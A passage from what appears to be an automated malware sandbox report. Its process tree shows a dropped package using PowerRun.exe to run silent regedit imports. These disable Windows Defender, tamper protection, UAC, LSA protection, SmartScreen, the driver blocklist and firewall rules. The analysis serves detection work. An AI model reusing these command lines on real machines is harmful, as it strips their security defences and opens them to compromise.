        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveServices.reg"
        7⤵
        Modifies security service
        Runs .reg file with regedit
        
        PID:3468
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveShellAssociation.reg"
      4⤵
      Executes dropped EXE
      PID:3352
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveShellAssociation.reg"
        5⤵
        Executes dropped EXE
        
        PID:2704
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveShellAssociation.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2640
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveShellAssociation.reg"
        7⤵
        Modifies firewall policy service
        Modifies registry class
        Runs .reg file with regedit
        
        PID:3672
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveSignatureUpdates.reg"
      4⤵
      Executes dropped EXE
      PID:3228
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveSignatureUpdates.reg"
        5⤵
        Executes dropped EXE
        
        PID:1232
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveSignatureUpdates.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3312
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveSignatureUpdates.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:2364
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveStartupEntries.reg"
      4⤵
      Executes dropped EXE
      PID:3916
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveStartupEntries.reg"
        5⤵
        Executes dropped EXE
        
        PID:2796
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveStartupEntries.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4396
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveStartupEntries.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:4668
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveWindowsWebThreat.reg"
      4⤵
      Executes dropped EXE
      PID:4688
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveWindowsWebThreat.reg"
        5⤵
        Executes dropped EXE
        
        PID:1296
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveWindowsWebThreat.reg"
        6⤵
        Executes dropped EXE
        
        PID:3580
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveWindowsWebThreat.reg"
        7⤵
        Modifies registry class
        Runs .reg file with regedit
        
        PID:928
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\WindowsSettingsPageVisibility.reg"
      4⤵
      Executes dropped EXE
      PID:4672
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\WindowsSettingsPageVisibility.reg"
        5⤵
        Executes dropped EXE
        
        PID:4892
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\WindowsSettingsPageVisibility.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1680
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\WindowsSettingsPageVisibility.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:3752
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableAntivirusProtection.reg"
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:796
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderandSecurityCenterNotifications.reg"
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:2992
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\DisableDefenderPolicies.reg"
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:1340
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\NomoreDelayandTimeouts.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:1324
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemovalofWindowsDefenderAntivirus.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:3116
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveDefenderTasks.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:1300
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoverofDefenderContextMenu.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:3360
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveServices.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:5076
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveShellAssociation.reg"
      4⤵
      Modifies firewall policy service
      System Location Discovery: System Language Discovery
      Modifies registry class
      Runs .reg file with regedit
      PID:3472
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveSignatureUpdates.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:3672
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveStartupEntries.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:316
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\RemoveWindowsWebThreat.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:2120
  - - C:\Windows\SysWOW64\regedit.exe
      regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_defender\WindowsSettingsPageVisibility.reg"
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:4936
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableDevDriveProtection.reg"
      4⤵
      Executes dropped EXE
      PID:512
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableDevDriveProtection.reg"
        5⤵
        Executes dropped EXE
        
        PID:5072
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableDevDriveProtection.reg"
        6⤵
        Executes dropped EXE
        
        PID:4944
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableDevDriveProtection.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableLSAProtection.reg"
      4⤵
      Executes dropped EXE
      PID:3604
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableLSAProtection.reg"
        5⤵
        Executes dropped EXE
        
        PID:1620
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableLSAProtection.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3856
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableLSAProtection.reg"
        7⤵
        Boot or Logon Autostart Execution: LSASS Driver
        Runs .reg file with regedit
        
        PID:2052
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMaintenanceTaskreportinginSecurityHealthUI.reg"
      4⤵
      Executes dropped EXE
      PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMaintenanceTaskreportinginSecurityHealthUI.reg"
        5⤵
        Executes dropped EXE
        
        PID:4464
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMaintenanceTaskreportinginSecurityHealthUI.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4908
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMaintenanceTaskreportinginSecurityHealthUI.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:3632
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMicrosoftVulnerabileDriverBlocklist.reg"
      4⤵
      Executes dropped EXE
      PID:4552
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMicrosoftVulnerabileDriverBlocklist.reg"
        5⤵
        Executes dropped EXE
        
        PID:1760
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMicrosoftVulnerabileDriverBlocklist.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1968
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableMicrosoftVulnerabileDriverBlocklist.reg"
        7⤵
        Modify Registry: Disable Windows Driver Blocklist
        Runs .reg file with regedit
        
        PID:2140
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSmartScreen.reg"
      4⤵
      Executes dropped EXE
      PID:3268
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSmartScreen.reg"
        5⤵
        Executes dropped EXE
        
        PID:3484
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSmartScreen.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:220
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSmartScreen.reg"
        7⤵
        Modifies data under HKEY_USERS
        Runs .reg file with regedit
        
        PID:752
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSpyNetTelemetry.reg"
      4⤵
      Executes dropped EXE
      PID:5092
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSpyNetTelemetry.reg"
        5⤵
        Executes dropped EXE
        
        PID:1704
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSpyNetTelemetry.reg"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3540
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSpyNetTelemetry.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:4964
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSystemMitigations.reg"
      4⤵
      Executes dropped EXE
      PID:2356
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSystemMitigations.reg"
        5⤵
        Executes dropped EXE
        
        PID:1960
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSystemMitigations.reg"
        6⤵
        Executes dropped EXE
        
        PID:4892
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableSystemMitigations.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:4428
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableTamperProtection.reg"
      4⤵
      Executes dropped EXE
      PID:928
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableTamperProtection.reg"
        5⤵
        
        PID:4508
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableTamperProtection.reg"
        6⤵
        
        PID:1260
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableTamperProtection.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:2200
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableUAC.reg"
      4⤵
      PID:3076
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableUAC.reg"
        5⤵
        
        PID:4556
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableUAC.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:2764
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableUAC.reg"
        7⤵
        UAC bypass
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Runs .reg file with regedit
        
        PID:3900
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableVBS.reg"
      4⤵
      PID:1900
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableVBS.reg"
        5⤵
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableVBS.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3928
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\DisableVBS.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\ExploitGuard_d.reg"
      4⤵
      PID:1444
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\ExploitGuard_d.reg"
        5⤵
        
        PID:3952
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\ExploitGuard_d.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4576
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\ExploitGuard_d.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:512
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\MitigationofFaultTorelantHeap.reg"
      4⤵
      PID:412
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\MitigationofFaultTorelantHeap.reg"
        5⤵
        
        PID:3696
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\MitigationofFaultTorelantHeap.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:1884
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\MitigationofFaultTorelantHeap.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:3600
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemovalofAnti-PhishingServices.reg"
      4⤵
      PID:2460
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemovalofAnti-PhishingServices.reg"
        5⤵
        
        PID:3664
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemovalofAnti-PhishingServices.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:2820
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemovalofAnti-PhishingServices.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\Remove and Disable Microsoft Pluton.reg"
      4⤵
      PID:2080
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\Remove and Disable Microsoft Pluton.reg"
        5⤵
        
        PID:2224
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\Remove and Disable Microsoft Pluton.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4964
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\Remove and Disable Microsoft Pluton.reg"
        7⤵
        Runs .reg file with regedit
        
        PID:3672
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveSecurityandMaintenance.reg"
      4⤵
      PID:3468
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveSecurityandMaintenance.reg"
        5⤵
        
        PID:3916
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveSecurityandMaintenance.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:1432
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveSecurityandMaintenance.reg"
        7⤵
        Modifies registry class
        Runs .reg file with regedit
        
        PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveWindowsDefenderFirewallRules.reg"
      4⤵
      PID:4936
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveWindowsDefenderFirewallRules.reg"
        5⤵
        
        PID:640
